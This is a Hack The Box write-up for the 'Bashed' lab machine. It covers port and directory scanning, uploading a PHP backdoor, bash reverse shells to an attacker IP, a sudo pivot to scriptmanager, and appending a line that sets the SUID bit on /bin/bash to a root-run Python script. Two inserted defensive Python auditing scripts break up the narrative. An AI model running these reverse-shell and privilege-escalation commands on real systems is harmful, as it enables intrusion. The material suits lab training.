Bashed-htb-writeup

0x00 Lab skills covered

Skills in this chapter: directory scanning, file upload, sudo, Python script analysis, SUID

Reference links: none

0x01 Obtaining user privileges

1. Get the target machine's IP address: 10.10.10.68

2. Probe the open ports:

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.68
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-19 23:11 CST
Warning: 10.10.10.68 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.68
Host is up (0.32s latency).
Not shown: 64287 closed tcp ports (reset), 1247 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 43.88 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports1 10.10.10.68 -sU
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-19 23:13 CST
Warning: 10.10.10.68 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.68
Host is up (0.43s latency).
All 65535 scanned ports on 10.10.10.68 are in ignored states.
Not shown: 65444 open|filtered udp ports (no-response), 91 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 78.15 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p80 --min-rate=10000 10.10.10.68 -sV -sC
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-19 23:26 CST
Nmap scan report for 10.10.10.68
Host is up (1.2s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.73 seconds

3. Only one port is open, so let's look at the website.

http://10.10.10.68/

phpbash helps a lot with pentesting. I have tested it on several different servers and it is very useful. In fact, I developed it on this server!

http://10.10.10.68/single.html


https://github.com/Arrexel/phpbash

4. The screenshot shows a shell-style interface; let's also look at what is in the GitHub repository.

https://github.com/Arrexel/phpbash

phpbash.min.php

phpbash.php

5. Run a quick directory scan.

┌──(kali㉿offsec)-[~/Desktop]
└─$ dirsearch -u http://10.10.10.68/ -e .php

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php | HTTP method: GET | Threads: 25 | Wordlist size: 9411

Output File: /home/kali/Desktop/reports/http_10.10.10.68/__24-05-19_23-34-49.txt

Target: http://10.10.10.68/

[23:34:49] Starting:
[23:34:53] 301 - 308B - /php -> http://10.10.10.68/php/
[23:36:12] 200 - 0B - /config.php
[23:36:18] 301 - 308B - /css -> http://10.10.10.68/css/
[23:36:22] 200 - 479B - /dev/
[23:36:22] 301 - 308B - /dev -> http://10.10.10.68/dev/
[23:36:37] 301 - 310B - /fonts -> http://10.10.10.68/fonts/
[23:36:43] 200 - 513B - /images/
[23:36:43] 301 - 311B - /images -> http://10.10.10.68/images/
[23:36:49] 301 - 307B - /js -> http://10.10.10.68/js/
[23:36:49] 200 - 660B - /js/
[23:37:13] 200 - 454B - /php/
[23:37:34] 403 - 300B - /server-status/
[23:37:34] 403 - 299B - /server-status
[23:37:53] 200 - 14B - /uploads/
[23:37:53] 301 - 312B - /uploads -> http://10.10.10.68/uploads/

Task Completed

6. A dev directory was found; let's visit it.

http://10.10.10.68/dev/

7. A quick attempt showed that a bash reverse shell would not connect back, so the only option left was to upload nc and try that, but the default nc has no -e option, so that did not work either.

www-data@bashed:/var/www/html/dev# wget http://10.10.14.45/qsd-php-backdoor.php

--2024-05-19 00:55:31-- http://10.10.14.45/qsd-php-backdoor.php
Connecting to 10.10.14.45:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13585 (13K) [application/octet-stream]
qsd-php-backdoor.php: Permission denied

Cannot write to 'qsd-php-backdoor.php' (Success).

8. While enumerating, I found that we have write permission on the uploads directory, so I put the web shell in that directory.

www-data@bashed:/var/www/html# cd uploads

www-data@bashed:/var/www/html/uploads# ls -la

total 12
drwxrwxrwx 2 root root 4096 Jun 2 2022 .
drw-r-xr-x 10 root root 4096 Jun 2 2022 ..
-rwxrwxrwx 1 root root 14 Dec 4 2017 index.html
www-data@bashed:/var/www/html/uploads# wget http://10.10.14.45/qsd-php-backdoor.php

--2024-05-19 01:00:30-- http://10.10.14.45/qsd-php-backdoor.php
Connecting to 10.10.14.45:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13585 (13K) [application/octet-stream]
Saving to: 'qsd-php-backdoor.php'

0K .......... ... 100% 33.9K=0.4s

2024-05-19 01:00:31 (33.9 KB/s) - 'qsd-php-backdoor.php' saved [13585/13585]

www-data@bashed:/var/www/html/uploads# ls

index.html
qsd-php-backdoor.php

9. Now try a reverse shell directly.

http://10.10.10.68/uploads/qsd-php-backdoor.php

bash -c "bash -i >& /dev/tcp/10.10.14.45/443 0>&1"

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.68] 34302
bash: cannot set terminal process group (821): Inappropriate ioctl for device
bash: no job control in this shell
www-data@bashed:/var/www/html/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@bashed:/var/www/html/uploads$

10. Then the first flag is obtained.

www-data@bashed:/var/www$ ls -la
ls -la
total 12
drwxr-xr-x 3 root root 4096 Jun 2 2022 .
drwxr-xr-x 12 root root 4096 Jun 2 2022 ..
drw-r-xr-x 10 root root 4096 Jun 2 2022 html
www-data@bashed:/var/www$ ls -la /home
ls -la /home
total 16
drwxr-xr-x 4 root root 4096 Dec 4 2017 .
drwxr-xr-x 23 root root 4096 Jun 2 2022 ..
drwxr-xr-x 4 arrexel arrexel 4096 Jun 2 2022 arrexel
drwxr-xr-x 3 scriptmanager scriptmanager 4096 Dec 4 2017 scriptmanager
www-data@bashed:/var/www$

www-data@bashed:/var/www$ cd /home/arrexel
cd /home/arrexel
www-data@bashed:/home/arrexel$ ls -la
ls -la
total 32
drwxr-xr-x 4 arrexel arrexel 4096 Jun 2 2022 .
drwxr-xr-x 4 root root 4096 Dec 4 2017 ..
lrwxrwxrwx 1 root root 9 Jun 2 2022 .bash_history -> /dev/null
-rw-r--r-- 1 arrexel arrexel 220 Dec 4 2017 .bash_logout
-rw-r--r-- 1 arrexel arrexel 3786 Dec 4 2017 .bashrc
drwx------ 2 arrexel arrexel 4096 Dec 4 2017 .cache
drwxrwxr-x 2 arrexel arrexel 4096 Dec 4 2017 .nano
-rw-r--r-- 1 arrexel arrexel 655 Dec 4 2017 .profile
-rw-r--r-- 1 arrexel arrexel 0 Dec 4 2017 .sudo_as_admin_successful
-r--r--r-- 1 arrexel arrexel 33 May 18 23:31 user.txt
www-data@bashed:/home/arrexel$ cat user.txt
cat user.txt
daa5414199b793a3305f56de63877587
www-data@bashed:/home/arrexel$

0x02 Obtaining system privileges

11. For privilege escalation, I ran the linpeas.sh script directly to enumerate information.

www-data@bashed:/var/www/html/uploads$ wget http://10.10.14.45/linpeas.sh
wget http://10.10.14.45/linpeas.sh
--2024-05-19 01:17:18-- http://10.10.14.45/linpeas.sh
Connecting to 10.10.14.45:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 847920 (828K) [text/x-sh]
Saving to: 'linpeas.sh'

0K .......... .......... .......... .......... .......... 6% 29.8K 26s
50K .......... .......... .......... .......... .......... 12% 44.6K 20s
100K .......... .......... .......... .......... .......... 18% 74.1K 16s
150K .......... .......... .......... .......... .......... 24% 66.6K 13s
200K .......... .......... .......... .......... .......... 30% 56.0K 12s
250K .......... .......... .......... .......... .......... 36% 114K 10s
300K .......... .......... .......... .......... .......... 42% 96.1K 8s
350K .......... .......... .......... .......... .......... 48% 98.7K 7s
400K .......... .......... .......... .......... .......... 54% 124K 6s
450K .......... .......... .......... .......... .......... 60% 105K 5s
500K .......... .......... .......... .......... .......... 66% 1.26M 4s
550K .......... .......... .......... .......... .......... 72% 131K 3s
600K .......... .......... .......... .......... .......... 78% 1.39M 2s
650K .......... .......... .......... .......... .......... 84% 173K 2s
700K .......... .......... .......... .......... .......... 90% 2.28M 1s
750K .......... .......... .......... .......... .......... 96% 164K 0s
800K .......... .......... ........ 100% 7.70M=8.5s

2024-05-19 01:17:28 (97.0 KB/s) - 'linpeas.sh' saved [847920/847920]

www-data@bashed:/var/www/html/uploads$ ls -la
ls -la
total 860
drwxrwxrwx 2 root root 4096 May 19 01:17 .
drw-r-xr-x 10 root root 4096 Jun 2 2022 ..
-rwxrwxrwx 1 root root 14 Dec 4 2017 index.html
-rw-r--r-- 1 www-data www-data 847920 Dec 27 22:40 linpeas.sh
-rw-r--r-- 1 www-data www-data 13585 Nov 20 2021 qsd-php-backdoor.php
www-data@bashed:/var/www/html/uploads$

www-data@bashed:/var/www/html/uploads$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@bashed:/var/www/html/uploads$ ./linpeas.sh

OS: Linux version 4.4.0-62-generic (buildd@lcy01-30) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017

https://github.com/jondonas/linux-exploit-suggester-2

[1] af_packet

CVE-2016-8655
Source: http://www.exploit-db.com/exploits/40871
[2] exploit_x
CVE-2018-14665
Source: http://www.exploit-db.com/exploits/45697
[3] get_rekt
CVE-2017-16695
Source: http://www.exploit-db.com/exploits/45010


╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid

Matching Defaults entries for www-data on bashed:

env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL

uid=1000(arrexel) gid=1000(arrexel) groups=1000(arrexel),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)

/home/arrexel/.bash_history

12. Here we find that we can run commands as the scriptmanager user without a password, so I use sudo to get a reverse shell as that user.

www-data@bashed:/var/www/html/uploads$ sudo -u scriptmanager bash -c "bash -i >& /dev/tcp/10.10.14.45/4444 0>&1"
<manager bash -c "bash -i >& /dev/tcp/10.10.14.45/4444 0>&1"

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 4444

listening on [any] 4444 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.68] 60220
bash: cannot set terminal process group (821): Inappropriate ioctl for device
bash: no job control in this shell
scriptmanager@bashed:/var/www/html/uploads$ id
id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)
scriptmanager@bashed:/var/www/html/uploads$
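The sudo grant that steps 11 and 12 rely on is easy to spot in `sudo -l` output once you look for it. The following is an added example, not code from the post: it parses `sudo -l` output (SUDO_L_OUTPUT is reconstructed from the linpeas section above) and ranks each rule from a defender's point of view; SERVICE_ACCOUNTS is an assumed list of accounts that should never hold sudo rights.

```python
import re

# Constructed from the `sudo -l` section of the post's linpeas output.
SUDO_L_OUTPUT = """\
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
"""

# Accounts that should never hold sudo rights at all (assumed list, not from the post).
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody", "mysql", "postgres"}

USER_RE = re.compile(r"^User (\S+) may run the following commands")
# One rule line: "(runas_user : runas_group) TAG: TAG: command"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>.+)$")


def parse_sudo_l(text):
    """Return (invoking_user, rules); each rule is {'runas', 'tags', 'cmd'}."""
    user, rules = None, []
    for line in text.splitlines():
        m = USER_RE.match(line)
        if m:
            user = m.group(1)
            continue
        if user is None:
            continue  # still inside the "Matching Defaults" block
        m = RULE_RE.match(line)
        if not m:
            continue
        # "(user : group)" -> keep the run-as user; "(user)" alone has no group part
        runas_user = m.group("runas").split(":")[0].strip() or "root"
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        rules.append({"runas": runas_user, "tags": tags, "cmd": m.group("cmd").strip()})
    return user, rules


def assess(user, rules):
    """Rank each rule for a defender; returns a list of (severity, message)."""
    findings = []
    for r in rules:
        passwordless = "NOPASSWD" in r["tags"]
        any_cmd = r["cmd"] == "ALL"
        as_root = r["runas"] in ("root", "ALL")
        if passwordless and any_cmd and as_root:
            sev = "critical"  # unrestricted root without a password
        elif passwordless and (any_cmd or user in SERVICE_ACCOUNTS):
            sev = "high"      # the Bashed case: www-data -> scriptmanager, any command
        elif passwordless:
            sev = "medium"
        else:
            sev = "info"
        findings.append((sev, f"{user} may run '{r['cmd']}' as {r['runas']} "
                              f"({'no password' if passwordless else 'password required'})"))
    return findings


if __name__ == "__main__":
    invoking_user, parsed = parse_sudo_l(SUDO_L_OUTPUT)
    for severity, message in assess(invoking_user, parsed):
        print(f"[{severity}] {message}")
```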

13. A few days ago I learned from a Q&A community that there is another tool like this, so I downloaded it to have a look; after running it, it did not seem very useful, not as good as linpeas.

scriptmanager@bashed:~$ wget http://10.10.14.45/lse.sh
wget http://10.10.14.45/lse.sh
--2024-05-19 01:53:48-- http://10.10.14.45/lse.sh
Connecting to 10.10.14.45:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 48875 (48K) [text/x-sh]
Saving to: 'lse.sh'

0K .......... .......... .......... .......... ....... 100% 58.5K=0.8s

2024-05-19 01:53:50 (58.5 KB/s) - 'lse.sh' saved [48875/48875]

scriptmanager@bashed:~$ chmod +x lse.sh
chmod +x lse.sh
scriptmanager@bashed:~$ ./lse.sh
---
If you know the current user password, write it here to check sudo privileges:
---

LSE Version: 4.14nw

User: scriptmanager
User ID: 1001
Password: none
Home: /home/scriptmanager
Path: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
umask: 0022

Hostname: bashed
Linux: 4.4.0-62-generic
Distribution: Ubuntu 16.04.2 LTS
Architecture: x86_64

=====================( Current Output Verbosity Level: 0 )======================
===============================================================( humanity )=====
[!] nowar0 Should we question autocrats and their "military operations"?... yes!
---
NO
WAR
---
==================================================================( users )=====
[i] usr000 Current user groups............................................. yes!
[*] usr010 Is current user in an administrative group?..................... nope
[*] usr020 Are there other users in administrative groups?................. yes!
[*] usr030 Other users with shell.......................................... yes!
[i] usr040 Environment information......................................... skip
[i] usr050 Groups for other users.......................................... skip
[i] usr060 Other users..................................................... skip
[*] usr070 PATH variables defined inside /etc.............................. yes!
[!] usr080 Is '.' in a PATH variable defined inside /etc?.................. nope
===================================================================( sudo )=====
[!] sud000 Can we sudo without a password?................................. nope
[!] sud010 Can we list sudo commands without a password?................... nope
[*] sud040 Can we read sudoers files?...................................... nope
[*] sud050 Do we know if any other users used sudo?........................ yes!
============================================================( file system )=====
[*] fst000 Writable files outside user's home.............................. yes!
[*] fst010 Binaries with setuid bit........................................ yes!
[!] fst020 Uncommon setuid binaries........................................ yes!
---
/usr/bin/vmware-user-suid-wrapper
---
[!] fst030 Can we write to any setuid binary?.............................. nope
[*] fst040 Binaries with setgid bit........................................ skip
[!] fst050 Uncommon setgid binaries........................................ skip
[!] fst060 Can we write to any setgid binary?.............................. skip
[*] fst070 Can we read /root?.............................................. nope
[*] fst080 Can we read subdirectories under /home?......................... yes!
[*] fst090 SSH files in home directories................................... nope
[*] fst100 Useful binaries................................................. yes!
[*] fst110 Other interesting files in home directories..................... nope
[!] fst120 Are there any credentials in fstab/mtab?........................ nope
[*] fst130 Does 'scriptmanager' have mail?................................. nope
[!] fst140 Can we access other users mail?................................. nope
[*] fst150 Looking for GIT/SVN repositories................................ nope
[!] fst160 Can we write to critical files?................................. nope
[!] fst170 Can we write to critical directories?........................... nope
[!] fst180 Can we write to directories from PATH defined in /etc?.......... nope
[!] fst190 Can we read any backup?......................................... nope
[!] fst200 Are there possible credentials in any shell history file?....... nope
[!] fst210 Are there NFS exports with 'no_root_squash' option?............. nope
[*] fst220 Are there NFS exports with 'no_all_squash' option?.............. nope
[i] fst500 Files owned by user 'scriptmanager'............................. skip
[i] fst510 SSH files anywhere.............................................. skip
[i] fst520 Check hosts.equiv file and its contents......................... skip
[i] fst530 List NFS server shares.......................................... skip
[i] fst540 Dump fstab file................................................. skip
=================================================================( system )=====
[i] sys000 Who is logged in................................................ skip
[i] sys010 Last logged in users............................................ skip
[!] sys020 Does the /etc/passwd have hashes?............................... nope
[!] sys022 Does the /etc/group have hashes?................................ nope
[!] sys030 Can we read shadow files?....................................... nope
[*] sys040 Check for other superuser accounts.............................. nope
[*] sys050 Can root user log in via SSH?................................... nope
[i] sys060 List available shells........................................... skip
[i] sys070 System umask in /etc/login.defs................................. skip
[i] sys080 System password policies in /etc/login.defs..................... skip
===============================================================( security )=====
[*] sec000 Is SELinux present?............................................. nope
[*] sec010 List files with capabilities.................................... yes!
[!] sec020 Can we write to a binary with caps?............................. nope
[!] sec030 Do we have all caps in any binary?.............................. nope
[*] sec040 Users with associated capabilities.............................. nope
[!] sec050 Does current user have capabilities?............................ skip
[!] sec060 Can we read the auditd log?..................................... nope
========================================================( recurrent tasks )=====
[*] ret000 User crontab.................................................... nope
[!] ret010 Cron tasks writable by user..................................... nope
[*] ret020 Cron jobs....................................................... yes!
[*] ret030 Can we read user crontabs....................................... nope
[*] ret040 Can we list other user cron tasks?.............................. nope
[*] ret050 Can we write to any paths present in cron jobs.................. nope
[!] ret060 Can we write to executable paths present in cron jobs........... skip
[i] ret400 Cron files...................................................... skip
[*] ret500 User systemd timers............................................. nope
[!] ret510 Can we write in any system timer?............................... nope
[i] ret900 Systemd timers.................................................. skip
================================================================( network )=====
[*] net000 Services listening only on localhost............................ nope
[!] net010 Can we sniff traffic with tcpdump?.............................. nope
[i] net500 NIC and IP information.......................................... skip
[i] net510 Routing table................................................... skip
[i] net520 ARP table....................................................... skip
[i] net530 Nameservers..................................................... skip
[i] net540 Systemd Nameservers............................................. skip
[i] net550 Listening TCP................................................... skip
[i] net560 Listening UDP................................................... skip
===============================================================( services )=====
[!] srv000 Can we write in service files?.................................. nope
[!] srv010 Can we write in binaries executed by services?.................. nope
[*] srv020 Files in /etc/init.d/ not belonging to root..................... nope
[*] srv030 Files in /etc/rc.d/init.d not belonging to root................. nope
[*] srv040 Upstart files not belonging to root............................. nope
[*] srv050 Files in /usr/local/etc/rc.d not belonging to root.............. nope
[i] srv400 Contents of /etc/inetd.conf..................................... skip
[i] srv410 Contents of /etc/xinetd.conf.................................... skip
[i] srv420 List /etc/xinetd.d if used...................................... skip
[i] srv430 List /etc/init.d/ permissions................................... skip
[i] srv440 List /etc/rc.d/init.d permissions............................... skip
[i] srv450 List /usr/local/etc/rc.d permissions............................ skip
[i] srv460 List /etc/init/ permissions..................................... skip
[!] srv500 Can we write in systemd service files?.......................... nope
[!] srv510 Can we write in binaries executed by systemd services?.......... nope
[*] srv520 Systemd files not belonging to root............................. nope
[i] srv900 Systemd config files permissions................................ skip
===============================================================( software )=====
[!] sof000 Can we connect to MySQL with root/root credentials?............. nope
[!] sof010 Can we connect to MySQL as root without password?............... nope
[!] sof015 Are there credentials in mysql_history file?.................... nope
[!] sof020 Can we connect to PostgreSQL template0 as postgres and no pass?. nope
[!] sof020 Can we connect to PostgreSQL template1 as postgres and no pass?. nope
[!] sof020 Can we connect to PostgreSQL template0 as psql and no pass?..... nope
[!] sof020 Can we connect to PostgreSQL template1 as psql and no pass?..... nope
[*] sof030 Installed apache modules........................................ yes!
[!] sof040 Found any .htpasswd files?...................................... nope
[!] sof050 Are there private keys in ssh-agent?............................ nope
[!] sof060 Are there gpg keys cached in gpg-agent?......................... nope
[!] sof070 Can we write to a ssh-agent socket?............................. nope
[!] sof080 Can we write to a gpg-agent socket?............................. nope
[!] sof090 Found any keepass database files?............................... nope
[!] sof100 Found any 'pass' store directories?............................. nope
[!] sof110 Are there any tmux sessions available?.......................... nope
[*] sof120 Are there any tmux sessions from other users?................... nope
[!] sof130 Can we write to tmux session sockets from other users?.......... nope
[!] sof140 Are any screen sessions available?.............................. nope
[*] sof150 Are there any screen sessions from other users?................. nope
[!] sof160 Can we write to screen session sockets from other users?........ nope
[*] sof170 Can we access MongoDB databases without credentials?............ nope
[!] sof180 Can we access any Kerberos credentials?......................... nope
[i] sof500 Sudo version.................................................... skip
[i] sof510 MySQL version................................................... skip
[i] sof520 Postgres version................................................ skip
[i] sof530 Apache version.................................................. skip
[i] sof540 Tmux version.................................................... skip
[i] sof550 Screen version.................................................. skip
=============================================================( containers )=====
[*] ctn000 Are we in a docker container?................................... nope
[*] ctn010 Is docker available?............................................ nope
[!] ctn020 Is the user a member of the 'docker' group?..................... nope
[*] ctn200 Are we in a lxc container?...................................... nope
[!] ctn210 Is the user a member of any lxc/lxd group?...................... nope
==============================================================( processes )=====
[i] pro000 Waiting for the process monitor to finish....................... yes!
[i] pro001 Retrieving process binaries..................................... yes!
[i] pro002 Retrieving process users........................................ yes!
[!] pro010 Can we write in any process binary?............................. nope
[*] pro020 Processes running with root permissions......................... yes!
[*] pro030 Processes running by non-root users with shell.................. yes!
[i] pro500 Running processes............................................... skip
[i] pro510 Running process binaries and permissions........................ skip
===================================================================( CVEs )=====
In order to test for CVEs, download lse.sh from the GitHub releases page.
Alternatively, build lse_cve.sh using tools/package_cvs_into_lse.sh from the
repository.
==================================( FINISHED )==================================

14. Through enumeration, a scripts directory was found under the root directory, containing a Python script.

scriptmanager@bashed:~$ cd /
cd /
scriptmanager@bashed:/$ ls -la
ls -la
total 92
drwxr-xr-x 23 root root 4096 Jun 2 2022 .
drwxr-xr-x 23 root root 4096 Jun 2 2022 ..
-rw------- 1 root root 174 Jun 14 2022 .bash_history
drwxr-xr-x 2 root root 4096 Jun 2 2022 bin
drwxr-xr-x 3 root root 4096 Jun 2 2022 boot
drwxr-xr-x 19 root root 4140 May 18 23:30 dev
drwxr-xr-x 89 root root 4096 Jun 2 2022 etc
drwxr-xr-x 4 root root 4096 Dec 4 2017 home
lrwxrwxrwx 1 root root 32 Dec 4 2017 initrd.img -> boot/initrd.img-4.4.0-62-generic
drwxr-xr-x 19 root root 4096 Dec 4 2017 lib
drwxr-xr-x 2 root root 4096 Jun 2 2022 lib64
drwx------ 2 root root 16384 Dec 4 2017 lost+found
drwxr-xr-x 4 root root 4096 Dec 4 2017 media
drwxr-xr-x 2 root root 4096 Jun 2 2022 mnt
drwxr-xr-x 2 root root 4096 Dec 4 2017 opt
dr-xr-xr-x 174 root root 0 May 18 23:30 proc
drwx------ 3 root root 4096 May 18 23:31 root
drwxr-xr-x 18 root root 500 May 18 23:30 run
drwxr-xr-x 2 root root 4096 Dec 4 2017 sbin
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Jun 2 2022 scripts
drwxr-xr-x 2 root root 4096 Feb 15 2017 srv
dr-xr-xr-x 13 root root 0 May 18 23:30 sys
drwxrwxrwt 10 root root 4096 May 19 02:05 tmp
drwxr-xr-x 10 root root 4096 Dec 4 2017 usr
drwxr-xr-x 12 root root 4096 Jun 2 2022 var
lrwxrwxrwx 1 root root 29 Dec 4 2017 vmlinuz -> boot/vmlinuz-4.4.0-62-generic
scriptmanager@bashed:/$ cd scripts
cd scripts
scriptmanager@bashed:/scripts$ ls -la
ls -la
total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Jun 2 2022 .
drwxr-xr-x 23 root root 4096 Jun 2 2022 ..
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py
-rw-r--r-- 1 root root 12 May 19 02:05 test.txt
scriptmanager@bashed:/scripts$ cat test.py
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
scriptmanager@bashed:/scripts$ cat test.txt
cat test.txt
testing 123!

15. Here I directly append one line of code to the script to escalate privileges.

scriptmanager@bashed:/scripts$ echo "import os;os.system('chmod u+s /bin/bash')" >> ./test.py
<ts$ echo "import os;os.system('chmod u+s /bin/bash')" >> ./test.py
scriptmanager@bashed:/scripts$ cat test.py
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
import os;os.system('chmod u+s /bin/bash')
scriptmanager@bashed:/scripts$ ls -la /bin/bash
ls -la /bin/bash
-rwsr-xr-x 1 root root 1037528 Jun 24 2016 /bin/bash
scriptmanager@bashed:/scripts$
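What steps 14 and 15 exploit is a script executed with root privileges (the post's listing shows test.txt owned by root and re-created with a fresh timestamp) while the script file and its directory are owned and writable by scriptmanager. The following is an added example, not code from the post: it walks a script path and every ancestor directory and reports each one that a non-root principal can modify. LS_LINES is reconstructed from the post's `ls -la` output so the audit runs offline; audit_live does the same against a real filesystem.

```python
import grp
import os
import pwd
import stat

# Reconstructed from the post's `ls -la /` and `ls -la /scripts` output.
LS_LINES = {
    "/": "drwxr-xr-x 23 root root 4096 Jun 2 2022 .",
    "/scripts": "drwxrwxr-- 2 scriptmanager scriptmanager 4096 Jun 2 2022 scripts",
    "/scripts/test.py": "-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py",
}


def parse_ls_line(line):
    """Return (perm_string, owner, group) from one `ls -l` line."""
    fields = line.split()
    return fields[0], fields[2], fields[3]


def non_root_writers(perms, owner, group):
    """Reasons a non-root principal can modify an object, from its 10-char
    ls permission string (type char, then rwx for owner, group, other)."""
    reasons = []
    if owner != "root" and perms[2] == "w":
        reasons.append(f"owner {owner} can write")
    if group != "root" and perms[5] == "w":
        reasons.append(f"group {group} can write")
    if perms[8] == "w":
        # The sticky bit (as on /tmp) stops others deleting or renaming entries.
        reasons.append("world-writable" + (" (sticky)" if perms[9] in "tT" else ""))
    return reasons


def ancestors(path):
    """Yield the path itself, then each parent directory up to '/'."""
    path = os.path.normpath(path)
    while True:
        yield path
        if path == "/":
            return
        path = os.path.dirname(path)


def audit_from_ls(script_path, ls_lines):
    """Offline audit: ls_lines maps each path on the chain to its ls -l line."""
    findings = []
    for p in ancestors(script_path):
        perms, owner, group = parse_ls_line(ls_lines[p])
        findings.extend((p, reason) for reason in non_root_writers(perms, owner, group))
    return findings


def audit_live(script_path):
    """Same audit against the local filesystem, resolving uid/gid to names."""
    findings = []
    for p in ancestors(script_path):
        st = os.lstat(p)
        try:
            owner = pwd.getpwuid(st.st_uid).pw_name
        except KeyError:
            owner = str(st.st_uid)
        try:
            group = grp.getgrgid(st.st_gid).gr_name
        except KeyError:
            group = str(st.st_gid)
        perms = stat.filemode(st.st_mode)
        findings.extend((p, r) for r in non_root_writers(perms, owner, group))
    return findings


if __name__ == "__main__":
    for path, reason in audit_from_ls("/scripts/test.py", LS_LINES):
        print(f"{path}: {reason}")
```

Any root-executed script that shows up here should be moved to a root-owned, root-writable-only directory (or the cron entry should run as the owning user instead).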

16. Get the final flag.

scriptmanager@bashed:/scripts$ bash -p
bash -p
id
uid=1001(scriptmanager) gid=1001(scriptmanager) euid=0(root) groups=1001(scriptmanager)
cd /root
ls -la
total 28
drwx------ 3 root root 4096 May 18 23:31 .
drwxr-xr-x 23 root root 4096 Jun 2 2022 ..
lrwxrwxrwx 1 root root 9 Jun 2 2022 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3121 Dec 4 2017 .bashrc
drwxr-xr-x 2 root root 4096 Jun 2 2022 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 66 Dec 4 2017 .selected_editor
-r-------- 1 root root 33 May 18 23:31 root.txt
cat root.txt
3383e7ca075694896c2fe89f5bb20946

0x03 Proof of completion

https://www.hackthebox.com/achievement/machine/1705469/118


Source: https://sh1yan.top/2024/05/20/Bashed-htb-writeup/
Author: shiyan
Published: May 20, 2024